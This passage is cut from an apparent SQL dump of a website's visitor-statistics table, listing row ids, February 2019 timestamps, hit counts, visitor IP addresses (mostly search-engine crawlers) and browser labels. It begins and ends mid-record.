54','chrome'),(384957,1549865575,1,1,0,0,'54.36.149.60','other'),(384958,1549865623,1,1,0,0,'54.36.148.108','other'),(384959,1549865794,1,1,0,0,'54.36.148.151','other'),(384960,1549866087,1,1,0,0,'185.220.101.60','other'),(384961,1549866149,1,1,0,0,'54.36.148.165','other'),(384962,1549866198,1,1,0,0,'54.36.148.97','other'),(384963,1549866212,109,109,0,0,'144.76.2.149','other'),(384964,1549866633,1,1,0,0,'216.244.66.241','other'),(384965,1549867405,1,1,0,0,'66.249.66.40','chrome'),(384966,1549867745,1,1,0,0,'8.29.198.26','other'),(384967,1549867894,1,1,0,0,'54.36.148.160','other'),(384968,1549868392,1,1,0,0,'66.249.66.44','chrome'),(384969,1549868498,1,1,0,0,'185.120.89.56','chrome'),(384970,1549868705,1,1,0,0,'212.26.140.63','firefox'),(384971,1549868811,1,1,0,0,'212.26.140.60','firefox'),(384972,1549869193,1,1,0,0,'8.29.198.27','other'),(384973,1549869400,1,1,0,0,'46.229.168.140','other'),(384974,1549869474,1,1,0,0,'40.77.167.14','other'),(384975,1549869552,1,1,0,0,'62.205.134.182','msie'),(384976,1549869970,3,3,0,0,'216.244.66.241','other'),(384977,1549870040,1,1,0,0,'95.163.255.99','other'),(384978,1549870092,1,1,0,0,'95.163.255.98','other'),(384979,1549870094,1,1,0,0,'95.163.255.94','other'),(384980,1549870120,1,1,0,0,'95.163.255.181','other'),(384981,1549870283,1,1,0,0,'95.220.46.161','msie'),(384982,1549870605,1,1,0,0,'54.36.148.228','other'),(384983,1549870866,1,1,0,0,'54.36.148.58','other'),(384984,1549871008,1,1,0,0,'40.77.167.14','other'),(384985,1549871193,1,1,0,0,'46.229.168.149','other'),(384986,1549871273,1,1,0,0,'157.55.39.219','other'),(384987,1549871331,1,1,0,0,'54.36.148.178','other'),(384988,1549871383,1,1,0,0,'46.229.168.148','other'),(384989,1549872078,1,1,0,0,'46.229.168.132','other'),(384990,1549872146,1,1,0,0,'40.77.167.14','other'),(384991,1549872589,8,8,0,0,'216.244.66.241','other'),(384992,1549872706,1,1,0,0,'3.91.2.189','other'),(384993,1549873493,1,1,0,0,'54.36.149.8','other'),(384994,1549873567,1,1,0,0,'40.77.167.167','other'),(384995,1549873574,1,1,0,0,'157.55.39.67','other'),(384996,1549874279,1,1,0,0,'207.46.13.241','other'),(384997,1549874425,1,1,0,0,'178.92.141.209','chrome'),(384998,1549875139,1,1,0,0,'46.229.168.143','other'),(384999,1549875197,3,3,0,0,'66.249.66.152','chrome'),(385000,1549875371,3,3,0,0,'216.244.66.241','other'),(385001,1549875795,1,1,0,0,'157.55.39.202','other'),(385002,1549876365,1,1,0,0,'66.249.66.152','chrome'),(385003,1549876408,2,2,0,0,'31.43.2.184','chrome'),(385004,1549876622,1,1,0,0,'95.163.255.178','other'),(385005,1549876786,1,1,0,0,'178.92.141.209','chrome'),(385006,1549877546,1,1,0,0,'207.46.13.69','other'),(385007,1549877607,1,1,0,0,'176.100.168.215','chrome'),(385008,1549877882,1,1,0,0,'91.196.177.46','firefox'),(385009,1549877902,1,1,0,0,'37.53.123.48','chrome'),(385010,1549877920,1,1,0,0,'91.196.178.66','chrome'),(385011,1549878358,1,1,0,0,'216.244.66.241','other'),(385012,1549878581,1,1,0,0,'8.29.198.25','other'),(385013,1549878692,1,1,0,0,'91.196.177.15','chrome'),(385014,1549879558,1,1,0,0,'46.229.168.147','other'),(385015,1549879855,1,1,0,0,'91.196.178.66','chrome'),(385016,1549879865,6,6,0,0,'5.9.154.69','other'),(385017,1549880032,1,1,0,0,'8.29.198.26','other'),(385018,1549880120,1,1,0,0,'216.244.66.241','other'),(385019,1549880395,1,1,0,0,'95.133.61.80','chrome'),(385020,1549880422,1,1,0,0,'95.134.220.144','chrome'),(385021,1549880493,1,1,0,0,'66.249.66.40','chrome'),(385022,1549880532,1,1,0,0,'91.196.178.65','chrome'),(385023,1549880641,3,3,0,0,'173.249.16.147','other'),(385024,1549880702,1,1,0,0,'111.202.101.135','other'),(385025,1549881161,1,1,0,0,'95.163.255.98','other'),(385026,1549881408,1,1,0,0,'46.200.223.146','chrome'),(385027,1549881618,1,1,0,0,'46.229.168.149','other'),(385028,1549881976,1,1,0,0,'95.132.45.255','firefox'),(385029,1549882069,1,1,0,0,'95.163.255.96','other'),(385030,1549882100,1,1,0,0,'95.163.255.95','other'),(385031,1549882151,1,1,0,0,'95.163.255.94','other'),(385032,1549882164,1,1,0,0,'95.163.255.93','other'),(385033,1549882255,1,1,0,0,'91.196.178.132','firefox'),(385034,1549882351,1,1,0,0,'94.45.49.222','chrome'),(385035,1549882433,1,1,0,0,'37.53.123.48','chrome'),(385036,1549882437,1,1,0,0,'46.229.168.136','other'),(385037,1549882681,1,1,0,0,'66.249.66.40','chrome'),(385038,1549882751,2,2,0,0,'216.244.66.241','other'),(385039,1549882973,1,1,0,0,'66.249.66.154','chrome'),(385040,1549883330,1,1,0,0,'46.229.168.130','other'),(385041,1549883814,1,1,0,0,'91.196.178.65','chrome'),(385042,1549883983,1,1,0,0,'207.46.13.69','other'),(385043,1549884180,1,1,0,0,'46.201.94.71','firefox'),(385044,1549884443,1,1,0,0,'46.229.168.147','other'),(385045,1549884480,1,1,0,0,'157.55.39.202','other'),(385046,1549884970,1,1,0,0,'207.46.13.69','other'),(385047,1549885284,1,1,0,0,'207.46.13.184','other'),(385048,1549885641,1,1,0,0,'94.100.221.234','chrome'),(385049,1549885667,1,1,0,0,'157.55.39.67','other'),(385050,1549885695,1,1,0,0,'66.249.66.44','chrome'),(385051,1549886199,2,2,0,0,'216.244.66.241','other'),(385052,1549886284,1,1,0,0,'212.26.139.166','chrome'),(385053,1549887118,1,1,0,0,'13.57.233.99','chrome'),(385054,1549887369,1,1,0,0,'157.55.39.202','other'),(385055,1549887418,1,1,0,0,'66.249.66.154','chrome'),(385056,1549887541,1,1,0,0,'66.249.66.40','chrome'),(385057,1549887816,1,1,0,0,'95.163.255.151','other'),(385058,1549888056,1,1,0,0,'66.249.66.152','chrome'),(385059,1549888110,1,1,0,0,'130.180.218.30','chrome'),(385060,1549888117,1,1,0,0,'95.163.255.98','other'),(385061,1549888238,4,4,0,0,'216.244.66.241','other'),(385062,1549888300,1,1,0,0,'197.85.7.106','firefox'),(385063,1549888595,1,1,0,0,'46.229.168.141','other'),(385064,1549888636,1,1,0,0,'31.184.238.107','chrome'),(385065,1549888644,1,1,0,0,'66.249.66.156','chrome'),(385066,1549888671,1,1,0,0,'195.10.210.70','chrome'),(385067,1549888914,1,1,0,0,'66.249.66.42','chrome'),(385068,1549889105,1,1,0,0,'91.124.182.170','firefox'),(385069,1549889116,1,1,0,0,'91.196.178.66','chrome'),(385070,1549889338,1,1,0,0,'66.249.66.40','chrome'),(385071,1549889419,1,1,0,0,'8.29.198.26','other'),(385072,1549889449,1,1,0,0,'66.249.66.154','chrome'),(385073,1549889590,2,2,0,0,'195.10.210.70','chrome'),(385074,1549889759,1,1,0,0,'46.229.168.141','other'),(385075,1549890204,1,1,0,0,'141.8.183.11','other'),(385076,1549890288,1,1,0,0,'66.249.66.40','chrome'),(385077,1549890419,1,1,0,0,'66.249.66.156','chrome'),(385078,1549890432,1,1,0,0,'66.249.66.154','chrome'),(385079,1549890460,1,1,0,0,'66.249.66.152','chrome'),(385080,1549890711,1,1,0,0,'157.55.39.202','other'),(385081,1549890859,1,1,0,0,'91.196.178.66','chrome'),(385082,1549890874,1,1,0,0,'8.29.198.25','other'),(385083,1549891209,1,1,0,0,'46.229.168.149','other'),(385084,1549891385,2,2,0,0,'66.249.66.152','chrome'),(385085,1549891815,2,2,0,0,'216.244.66.241','other'),(385086,1549891835,1,1,0,0,'46.229.168.151','other'),(385087,1549892077,1,1,0,0,'62.205.134.182','msie'),(385088,1549892617,1,1,0,0,'185.211.245.167','chrome'),(385089,1549892732,1,1,0,0,'91.196.178.66','chrome'),(385090,1549892781,1,1,0,0,'66.249.66.156','chrome'),(385091,1549893717,1,1,0,0,'157.55.39.202','other'),(385092,1549893872,1,1,0,0,'66.249.66.152','chrome'),(385093,1549894441,1,1,0,0,'91.196.178.100','chrome'),(385094,1549895185,1,1,0,0,'66.249.66.154','chrome'),(385095,1549895386,1,1,0,0,'46.229.168.141','other'),(385096,1549895581,2,2,0,0,'157.55.39.228','other'),(385097,1549895615,1,1,0,0,'40.77.167.100','other'),(385098,1549895633,1,1,0,0,'66.249.66.152','chrome'),(385099,1549895807,1,1,0,0,'46.229.168.134','other'),(385100,1549896050,1,1,0,0,'3.93.163.169','other'),(385101,1549896180,1,1,0,0,'46.229.168.146','other'),(385102,1549896416,1,1,0,0,'46.229.168.139','other'),(385103,1549896435,1,1,0,0,'94.231.178.209','chrome'),(385104,1549896682,1,1,0,0,'66.249.66.42','chrome'),(385105,1549896689,1,1,0,0,'40.77.167.100','other'),(385106,1549896951,1,1,0,0,'46.229.168.134','other'),(385107,1549897182,1,1,0,0,'82.207.49.58','chrome'),(385108,1549897197,1,1,0,0,'216.244.66.241','other'),(385109,1549897270,1,1,0,0,'66.249.66.156','chrome'),(385110,1549897689,1,1,0,0,'178.133.110.102','chrome'),(385111,1549897983,1,1,0,0,'157.55.39.228','other'),(385112,1549898150,2,2,0,0,'207.46.13.184','other'),(385113,1549898160,1,1,0,0,'66.249.66.40','chrome'),(385114,1549898450,1,1,0,0,'66.249.66.152','chrome'),(385115,1549898973,1,1,0,0,'95.163.255.171','other'),(385116,1549899403,1,1,0,0,'207.46.13.79','other'),(385117,1549899499,1,1,0,0,'40.77.167.168','other'),(385118,1549899863,1,1,0,0,'216.244.66.241','other'),(385119,1549900205,1,1,0,0,'66.249.66.152','chrome'),(385120,1549900261,1,1,0,0,'8.29.198.26','other'),(385121,1549900342,1,1,0,0,'66.249.66.154','chrome'),(385122,1549900524,1,1,0,0,'95.163.255.92','other'),(385123,1549900771,1,1,0,0,'157.55.39.228','other'),(385124,1549900942,1,1,0,0,'46.229.168.147','other'),(385125,1549900957,1,1,0,0,'66.249.66.156','chrome'),(385126,1549901088,1,1,0,0,'46.229.168.135','other'),(385127,1549901134,1,1,0,0,'52.53.201.78','chrome'),(385128,1549901741,1,1,0,0,'8.29.198.26','other'),(385129,1549901896,2,2,0,0,'216.244.66.241','other'),(385130,1549902553,1,1,0,0,'46.229.168.132','other'),(385131,1549902940,1,1,0,0,'18.212.206.217','other'),(385132,1549903028,1,1,0,0,'46.211.122.98','chrome'),(385133,1549903214,1,1,0,0,'40.77.167.100','other'),(385134,1549903779,1,1,0,0,'46.229.168.142','other'),(385135,1549903830,1,1,0,0,'188.163.5.14','chrome'),(385136,1549903931,1,1,0,0,'66.249.66.152','chrome'),(385137,1549903974,1,1,0,0,'207.46.13.50','other'),(385138,1549904759,1,1,0,0,'46.229.168.149','other'),(385139,1549905108,2,2,0,0,'157.55.39.228','other'),(385140,1549905127,1,1,0,0,'91.196.178.61','chrome'),(385141,1549905249,7,7,0,0,'216.244.66.241','other'),(385142,1549905992,1,1,0,0,'95.163.255.163','other'),(385143,1549906010,1,1,0,0,'40.77.167.112','other'),(385144,1549906782,1,1,0,0,'95.163.255.92','other'),(385145,1549907320,1,1,0,0,'46.229.168.151','other'),(385146,1549907553,2,2,0,0,'66.249.66.40','chrome'),(385147,1549907945,2,2,0,0,'216.244.66.241','other'),(385148,1549908017,1,1,0,0,'46.229.168.136','other'),(385149,1549908102,1,1,0,0,'66.249.66.152','chrome'),(385150,1549908168,3,3,0,0,'66.249.66.154','chrome'),(385151,1549908405,1,1,0,0,'66.249.66.156','chrome'),(385152,1549908606,1,1,0,0,'5.45.207.79','other'),(385153,1549908716,1,1,0,0,'46.229.168.133','other'),(385154,1549909086,1,1,0,0,'130.180.216.22','chrome'),(385155,1549909444,1,1,0,0,'46.229.168.153','other'),(385156,1549909604,1,1,0,0,'91.196.178.82','firefox'),(385157,1549909830,1,1,0,0,'66.249.66.42','chrome'),(385158,1549909846,1,1,0,0,'91.124.181.61','chrome'),(385159,1549909952,1,1,0,0,'46.229.168.146','other'),(385160,1549909997,1,1,0,0,'66.249.66.156','chrome'),(385161,1549910153,2,2,0,0,'216.244.66.241','other'),(385162,1549910391,1,1,0,0,'66.249.66.44','chrome'),(385163,1549910774,1,1,0,0,'95.163.255.177','other'),(385164,1549910788,1,1,0,0,'66.249.66.42','chrome'),(385165,1549910858,1,1,0,0,'157.55.39.185','other'),(385166,1549911099,1,1,0,0,'8.29.198.26','other'),(385167,1549912124,1,1,0,0,'91.196.178.170','chrome'),(385168,1549912237,2,2,0,0,'216.244.66.241','other'),(385169,1549912306,1,1,0,0,'37.73.8.233','chrome'),(385170,1549912341,1,1,0,0,'180.76.15.23','other'),(385171,1549912588,1,1,0,0,'8.29.198.25','other'),(385172,1549913001,1,1,0,0,'95.163.255.176','other'),(385173,1549913088,1,1,0,0,'46.229.168.144','other'),(385174,1549914007,1,1,0,0,'66.249.66.154','chrome'),(385175,1549914130,1,1,0,0,'46.229.168.136','other'),(385176,1549914161,1,1,0,0,'157.55.39.93','other'),(385177,1549915356,4,4,0,0,'216.244.66.241','other'),(385178,1549915491,1,1,0,0,'178.95.159.215','chrome'),(385179,1549915571,1,1,0,0,'207.46.13.24','other'),(385180,1549915612,1,1,0,0,'66.249.66.40','chrome'),(385181,1549915884,1,1,0,0,'157.55.39.93','other'),(385182,1549915964,1,1,0,0,'46.229.168.136','other'),(385183,1549916562,2,2,0,0,'207.46.13.102','other'),(385184,1549916907,1,1,0,0,'180.76.15.16','other'),(385185,1549918082,6,6,0,0,'216.244.66.241','other'),(385186,1549920141,1,1,0,0,'207.46.13.104','other'),(385187,1549920184,1,1,0,0,'66.249.66.154','chrome'),(385188,1549920308,1,1,0,0,'66.249.66.152','chrome'),(385189,1549920339,1,1,0,0,'46.229.168.150','other'),(385190,1549920549,1,1,0,0,'109.87.39.244','chrome'),(385191,1549920725,1,1,0,0,'46.229.168.148','other'),(385192,1549920796,3,3,0,0,'216.244.66.241','other'),(385193,1549920917,1,1,0,0,'46.229.168.153','other'),(385194,1549921114,1,1,0,0,'66.249.66.156','chrome'),(385195,1549921462,1,1,0,0,'207.46.13.101','other'),(385196,1549921701,1,1,0,0,'66.249.66.154','chrome'),(385197,1549921907,1,1,0,0,'91.196.178.185','chrome'),(385198,1549921953,1,1,0,0,'8.29.198.25','other'),(385199,1549922147,1,1,0,0,'91.209.11.236','other'),(385200,1549922669,1,1,0,0,'46.229.168.132','other'),(385201,1549922750,1,1,0,0,'66.249.66.152','chrome'),(385202,1549922823,1,1,0,0,'66.249.66.44','chrome'),(385203,1549923431,1,1,0,0,'8.29.198.27','other'),(385204,1549923607,2,2,0,0,'216.244.66.241','other'),(385205,1549924030,1,1,0,0,'66.249.66.156','chrome'),(385206,1549924507,1,1,0,0,'46.229.168.134','other'),(385207,1549924690,2,2,0,0,'207.46.13.101','other'),(385208,1549926192,2,2,0,0,'207.46.13.182','other'),(385209,1549926448,1,1,0,0,'66.249.66.42','chrome'),(385210,1549926714,2,2,0,0,'216.244.66.241','other'),(385211,1549926794,1,1,0,0,'66.249.66.154','chrome'),(385212,1549926876,1,1,0,0,'207.46.13.101','other'),(385213,1549927416,1,1,0,0,'66.249.66.40','chrome'),(385214,1549927499,1,1,0,0,'66.249.66.152','chrome'),(385215,1549928383,1,1,0,0,'207.46.13.182','other'),(385216,1549928450,1,1,0,0,'46.229.168.151','other'),(385217,1549929089,2,2,0,0,'157.55.39.142','other'),(385218,1549929403,1,1,0,0,'91.196.178.185','chrome'),(385219,1549929442,1,1,0,0,'46.229.168.148','other'),(385220,1549929557,1,1,0,0,'216.244.66.241','other'),(385221,1549929586,1,1,0,0,'66.249.66.156','chrome'),(385222,1549930155,2,2,0,0,'66.249.66.154','chrome'),(385223,1549930162,1,1,0,0,'66.249.66.40','chrome'),(385224,1549931257,1,1,0,0,'66.249.66.152','chrome'),(385225,1549931513,6,6,0,0,'216.244.66.241','other'),(385226,1549931595,1,1,0,0,'46.229.168.146','other'),(385227,1549931896,1,1,0,0,'207.46.13.101','other'),(385228,1549932304,1,1,0,0,'66.249.66.152','chrome'),(385229,1549932417,1,1,0,0,'216.244.66.241','other'),(385230,1549932532,1,1,0,0,'176.38.23.7','firefox'),(385231,1549932628,1,1,0,0,'40.77.167.44','other'),(385232,1549932792,1,1,0,0,'8.29.198.26','other'),(385233,1549932916,1,1,0,0,'46.229.168.134','other'),(385234,1549933779,1,1,0,0,'66.249.66.44','chrome'),(385235,1549934135,1,1,0,0,'46.229.168.132','other'),(385236,1549934267,1,1,0,0,'8.29.198.27','other'),(385237,1549934546,1,1,0,0,'40.77.167.44','other'),(385238,1549935025,5,5,0,0,'216.244.66.241','other'),(385239,1549935183,2,2,0,0,'66.249.66.156','chrome'),(385240,1549935282,3,3,0,0,'66.249.66.152','chrome'),(385241,1549935663,1,1,0,0,'46.229.168.137','other'),(385242,1549935675,1,1,0,0,'66.249.66.44','chrome'),(385243,1549936702,4,4,0,0,'216.244.66.241','other'),(385244,1549936940,1,1,0,0,'40.77.167.20','other'),(385245,1549937200,1,1,0,0,'66.249.66.156','chrome'),(385246,1549939033,1,1,0,0,'207.46.13.27','other'),(385247,1549939181,1,1,0,0,'66.249.66.152','chrome'),(385248,1549939537,1,1,0,0,'180.76.15.14','other'),(385249,1549939885,1,1,0,0,'40.77.167.60','other'),(385250,1549940071,3,3,0,0,'216.244.66.241','other'),(385251,1549940088,1,1,0,0,'91.209.11.236','other'),(385252,1549940279,1,1,0,0,'207.46.13.142','other'),(385253,1549940844,3,3,0,0,'69.58.178.58','other'),(385254,1549940862,1,1,0,0,'46.229.168.147','other'),(385255,1549940871,1,1,0,0,'178.154.244.11','other'),(385256,1549941246,2,2,0,0,'66.249.75.21','chrome'),(385257,1549942044,2,2,0,0,'216.244.66.241','other'),(385258,1549942670,1,1,0,0,'46.229.168.147','other'),(385259,1549943027,1,1,0,0,'46.229.168.146','other'),(385260,1549943238,2,2,0,0,'54.213.109.250','chrome'),(385261,1549943634,1,1,0,0,'8.29.198.25','other'),(385262,1549944521,1,1,0,0,'46.229.168.144','other'),(385263,1549944905,2,2,0,0,'66.249.75.20','chrome'),(385264,1549945108,1,1,0,0,'8.29.198.25','other'),(385265,1549945442,1,1,0,0,'157.55.39.71','other'),(385266,1549945633,1,1,0,0,'216.244.66.241','other'),(385267,1549946012,1,1,0,0,'157.55.39.185','other'),(385268,1549946146,1,1,0,0,'46.229.168.135','other'),(385269,1549947392,1,1,0,0,'46.229.168.150','other'),(385270,1549947733,6,6,0,0,'216.244.66.241','other'),(385271,1549948138,1,1,0,0,'66.249.75.144','chrome'),(385272,1549948835,1,1,0,0,'66.249.75.22','chrome'),(385273,1549948937,1,1,0,0,'46.229.168.140','other'),(385274,1549950035,1,1,0,0,'46.229.168.143','other'),(385275,1549950381,1,1,0,0,'66.249.75.20','chrome'),(385276,1549950600,1,1,0,0,'40.77.167.160','other'),(385277,1549950604,6,6,0,0,'207.46.13.38','other'),(385278,1549950613,1,1,0,0,'157.55.39.71','other'),(385279,1549950616,2,2,0,0,'40.77.167.136','other'),(385280,1549950806,1,1,0,0,'66.249.69.149','chrome'),(385281,1549950826,1,1,0,0,'66.249.75.142','chrome'),(385282,1549950838,3,3,0,0,'216.244.66.241','other'),(385283,1549950914,1,1,0,0,'46.229.168.152','other'),(385284,1549950991,1,1,0,0,'82.207.49.106','chrome'),(385285,1549951808,1,1,0,0,'66.249.75.142','chrome'),(385286,1549952479,1,1,0,0,'207.46.13.38','other'),(385287,1549952481,1,1,0,0,'46.229.168.140','other'),(385288,1549952624,1,1,0,0,'66.249.75.144','chrome'),(385289,1549952769,1,1,0,0,'46.229.168.129','other'),(385290,1549952928,1,1,0,0,'66.249.69.150','chrome'),(385291,1549953123,1,1,0,0,'46.229.168.139','other'),(385292,1549953147,1,1,0,0,'91.196.178.94','chrome'),(385293,1549953279,1,1,0,0,'157.55.39.71','other'),(385294,1549953398,1,1,0,0,'91.196.178.69','chrome'),(385295,1549953837,1,1,0,0,'46.229.168.134','other'),(385296,1549954113,1,1,0,0,'5.45.207.79','other'),(385297,1549954235,1,1,0,0,'216.244.66.241','other'),(385298,1549954326,1,1,0,0,'46.229.168.142','other'),(385299,1549954460,1,1,0,0,'5.45.207.19','other'),(385300,1549954469,1,1,0,0,'8.29.198.25','other'),(385301,1549954526,1,1,0,0,'46.229.168.151','other'),(385302,1549954763,1,1,0,0,'157.55.39.154','other'),(385303,1549954771,1,1,0,0,'178.154.244.11','other'),(385304,1549954818,1,1,0,0,'66.249.69.149','chrome'),(385305,1549954965,1,1,0,0,'46.200.17.96','chrome'),(385306,1549955354,1,1,0,0,'66.249.69.150','chrome'),(385307,1549955369,1,1,0,0,'40.77.167.136','other'),(385308,1549955454,1,1,0,0,'46.229.168.141','other'),(385309,1549955596,1,1,0,0,'37.9.113.148','other'),(385310,1549955697,1,1,0,0,'91.196.178.172','chrome'),(385311,1549955704,2,2,0,0,'91.196.178.93','chrome'),(385312,1549955734,1,1,0,0,'66.249.69.149','chrome'),(385313,1549955835,1,1,0,0,'95.108.213.4','other'),(385314,1549955949,1,1,0,0,'8.29.198.25','other'),(385315,1549955982,2,2,0,0,'95.132.9.211','chrome'),(385316,1549956226,5,5,0,0,'216.244.66.241','other'),(385317,1549956500,1,1,0,0,'207.46.13.83','other'),(385318,1549956532,1,1,0,0,'66.249.75.142','chrome'),(385319,1549957190,1,1,0,0,'95.132.9.211','chrome'),(385320,1549957555,1,1,0,0,'207.46.13.83','other'),(385321,1549958482,1,1,0,0,'91.196.178.172','chrome'),(385322,1549958500,1,1,0,0,'66.249.69.150','chrome'),(385323,1549958866,1,1,0,0,'66.249.69.149','chrome'),(385324,1549959188,2,2,0,0,'216.244.66.241','other'),(385325,1549959328,1,1,0,0,'46.229.168.135','other'),(385326,1549959590,1,1,0,0,'194.242.98.154','chrome'),(385327,1549959925,1,1,0,0,'5.45.207.79','other'),(385328,1549960030,2,2,0,0,'66.249.69.149','chrome'),(385329,1549960792,1,1,0,0,'66.249.69.150','chrome'),(385330,1549961055,1,1,0,0,'46.229.168.137','other'),(385331,1549961289,1,1,0,0,'91.196.178.172','chrome'),(385332,1549961537,1,1,0,0,'46.201.227.249','chrome'),(385333,1549962015,1,1,0,0,'95.67.48.158','chrome'),(385334,1549962082,1,1,0,0,'66.249.69.149','chrome'),(385335,1549962308,1,1,0,0,'66.249.69.150','chrome'),(385336,1549962406,1,1,0,0,'216.244.66.241','other'),(385337,1549962856,1,1,0,0,'46.219.222.154','chrome'),(385338,1549962918,1,1,0,0,'40.77.167.140','other'),(385339,1549963041,1,1,0,0,'207.46.13.83','other'),(385340,1549963104,1,1,0,0,'95.132.9.211','chrome'),(385341,1549963335,1,1,0,0,'46.229.168.144','other'),(385342,1549964310,1,1,0,0,'66.249.69.148','chrome'),(385343,1549964652,1,1,0,0,'92.112.5.69','chrome'),(385344,1549965079,1,1,0,0,'66.249.69.149','chrome'),(385345,1549965304,1,1,0,0,'8.29.198.26','other'),(385346,1549965316,1,1,0,0,'207.46.13.83','other'),(385347,1549965396,2,2,0,0,'213.159.245.63','firefox'),(385348,1549965449,2,2,0,0,'66.249.75.142','chrome'),(385349,1549965613,1,1,0,0,'91.196.178.69','chrome'),(385350,1549966132,1,1,0,0,'66.249.69.150','chrome'),(385351,1549966152,1,1,0,0,'46.229.168.141','other'),(385352,1549966439,1,1,0,0,'40.77.167.132','other'),(385353,1549966504,1,1,0,0,'46.229.168.133','other'),(385354,1549966621,1,1,0,0,'95.132.56.133','chrome'),(385355,1549966649,1,1,0,0,'46.229.168.134','other'),(385356,1549966765,1,1,0,0,'93.170.114.172','chrome'),(385357,1549966791,1,1,0,0,'8.29.198.27','other'),(385358,1549966978,1,1,0,0,'66.249.69.148','chrome'),(385359,1549967082,1,1,0,0,'40.77.167.140','other'),(385360,1549967161,1,1,0,0,'46.229.168.132','other'),(385361,1549967530,1,1,0,0,'46.229.168.130','other'),(385362,1549967693,1,1,0,0,'66.249.69.150','chrome'),(385363,1549967793,1,1,0,0,'216.244.66.241','other'),(385364,1549968210,1,1,0,0,'40.77.167.132','other'),(385365,1549968251,1,1,0,0,'40.77.167.140','other'),(385366,1549969871,1,1,0,0,'91.196.178.130','firefox'),(385367,1549969875,1,1,0,0,'207.46.13.176','other'),(385368,1549970782,1,1,0,0,'91.196.178.188','chrome'),(385369,1549971270,1,1,0,0,'5.45.207.19','other'),(385370,1549971570,1,1,0,0,'66.249.69.150','chrome'),(385371,1549971625,1,1,0,0,'66.249.69.148','chrome'),(385372,1549971632,1,1,0,0,'176.36.246.20','chrome'),(385373,1549971957,1,1,0,0,'176.124.236.137','chrome'),(385374,1549971979,1,1,0,0,'91.196.178.61','chrome'),(385375,1549972279,1,1,0,0,'46.229.168.133','other'),(385376,1549972337,1,1,0,0,'66.249.75.144','chrome'),(385377,1549972489,1,1,0,0,'216.244.66.241','other'),(385378,1549972630,1,1,0,0,'178.154.244.11','other'),(385379,1549972664,1,1,0,0,'91.229.240.78','chrome'),(385380,1549972795,2,2,0,0,'52.207.232.95','other'),(385381,1549973136,1,1,0,0,'66.249.75.142','chrome'),(385382,1549973175,1,1,0,0,'207.46.13.176','other'),(385383,1549973889,1,1,0,0,'66.249.69.148','chrome'),(385384,1549974284,1,1,0,0,'46.229.168.133','other'),(385385,1549974533,1,1,0,0,'91.196.177.46','firefox'),(385386,1549974916,1,1,0,0,'207.46.13.176','other'),(385387,1549975065,1,1,0,0,'40.77.167.71','other'),(385388,1549975158,1,1,0,0,'91.124.182.170','firefox'),(385389,1549975205,1,1,0,0,'46.229.168.136','other'),(385390,1549975235,1,1,0,0,'66.249.75.21','chrome'),(385391,1549975596,1,1,0,0,'216.244.66.241','other'),(385392,1549976150,1,1,0,0,'8.29.198.25','other'),(385393,1549976218,2,2,0,0,'157.55.39.99','other'),(385394,1549976366,1,0,1,0,'66.249.75.142',''),(385395,1549976373,1,1,0,0,'91.124.243.206','chrome'),(385396,1549976746,1,1,0,0,'78.111.189.112','chrome'),(385397,1549976771,1,1,0,0,'66.249.75.144','chrome'),(385398,1549976778,1,1,0,0,'66.249.75.142','chrome'),(385399,1549976906,1,1,0,0,'66.249.75.140','chrome'),(385400,1549977562,1,1,0,0,'91.196.178.172','chrome'),(385401,1549977569,1,1,0,0,'66.249.75.21','chrome'),(385402,1549977631,1,1,0,0,'8.29.198.25','other'),(385403,1549977858,1,1,0,0,'66.249.75.22','chrome'),(385404,1549978337,1,1,0,0,'66.249.69.150','chrome'),(385405,1549978463,1,1,0,0,'216.244.66.241','other'),(385406,1549978817,1,1,0,0,'66.249.75.144','chrome'),(385407,1549978830,1,1,0,0,'207.46.13.176','other'),(385408,1549978994,1,1,0,0,'78.111.189.112','chrome'),(385409,1549979004,1,1,0,0,'157.55.39.99','other'),(385410,1549979117,1,1,0,0,'91.196.178.69','chrome'),(385411,1549979291,1,1,0,0,'35.187.111.18','firefox'),(385412,1549979896,1,1,0,0,'66.249.75.22','chrome'),(385413,1549979947,1,1,0,0,'207.46.13.176','other'),(385414,1549980100,1,1,0,0,'66.249.69.150','chrome'),(385415,1549980529,1,1,0,0,'216.244.66.241','other'),(385416,1549980533,1,1,0,0,'46.229.168.140','other'),(385417,1549981294,1,1,0,0,'91.209.11.236','other'),(385418,1549981464,1,1,0,0,'157.55.39.29','other'),(385419,1549982341,1,1,0,0,'91.209.11.236','other'),(385420,1549982871,1,1,0,0,'37.52.175.240','chrome'),(385421,1549982898,1,1,0,0,'5.45.207.19','other'),(385422,1549982946,1,1,0,0,'66.249.75.22','chrome'),(385423,1549983165,2,2,0,0,'66.249.69.149','chrome'),(385424,1549983272,1,1,0,0,'66.249.75.140','chrome'),(385425,1549983488,3,3,0,0,'216.244.66.241','other'),(385426,1549983590,1,1,0,0,'37.52.8.26','chrome'),(385427,1549983808,1,1,0,0,'66.249.69.148','chrome'),(385428,1549984586,1,1,0,0,'93.158.166.7','other'),(385429,1549984751,1,1,0,0,'157.55.39.29','other'),(385430,1549984960,1,1,0,0,'95.163.255.97','other'),(385431,1549985002,1,1,0,0,'207.189.30.149','msie'),(385432,1549985279,1,1,0,0,'66.249.69.148','chrome'),(385433,1549985512,1,1,0,0,'216.244.66.241','other'),(385434,1549985951,1,1,0,0,'150.95.54.204','firefox'),(385435,1549986187,1,1,0,0,'34.228.42.90','other'),(385436,1549986719,1,1,0,0,'66.249.75.142','chrome'),(385437,1549986851,1,1,0,0,'66.249.69.149','chrome'),(385438,1549987002,1,1,0,0,'8.29.198.27','other'),(385439,1549987746,1,1,0,0,'34.228.42.90','other'),(385440,1549988233,1,1,0,0,'46.229.168.137','other'),(385441,1549988413,1,1,0,0,'46.229.168.150','other'),(385442,1549988485,1,1,0,0,'8.29.198.25','other'),(385443,1549989302,6,6,0,0,'216.244.66.241','other'),(385444,1549989492,4,4,0,0,'34.228.42.90','other'),(385445,1549989562,1,1,0,0,'46.229.168.142','other'),(385446,1549990632,1,1,0,0,'46.211.125.153','chrome'),(385447,1549990790,1,1,0,0,'95.163.255.93','other'),(385448,1549990906,1,1,0,0,'95.163.255.94','other'),(385449,1549991014,1,1,0,0,'46.229.168.132','other'),(385450,1549991055,1,1,0,0,'157.55.39.203','other'),(385451,1549991438,1,1,0,0,'46.229.168.140','other'),(385452,1549991439,1,1,0,0,'157.55.39.29','other'),(385453,1549991711,1,1,0,0,'95.163.255.193','other'),(385454,1549991840,1,1,0,0,'66.249.75.21','chrome'),(385455,1549992565,1,1,0,0,'95.163.255.178','other'),(385456,1549992576,1,1,0,0,'46.229.168.132','other'),(385457,1549992606,1,1,0,0,'34.228.42.90','other'),(385458,1549992687,1,1,0,0,'40.77.167.112','other'),(385459,1549992874,1,1,0,0,'46.211.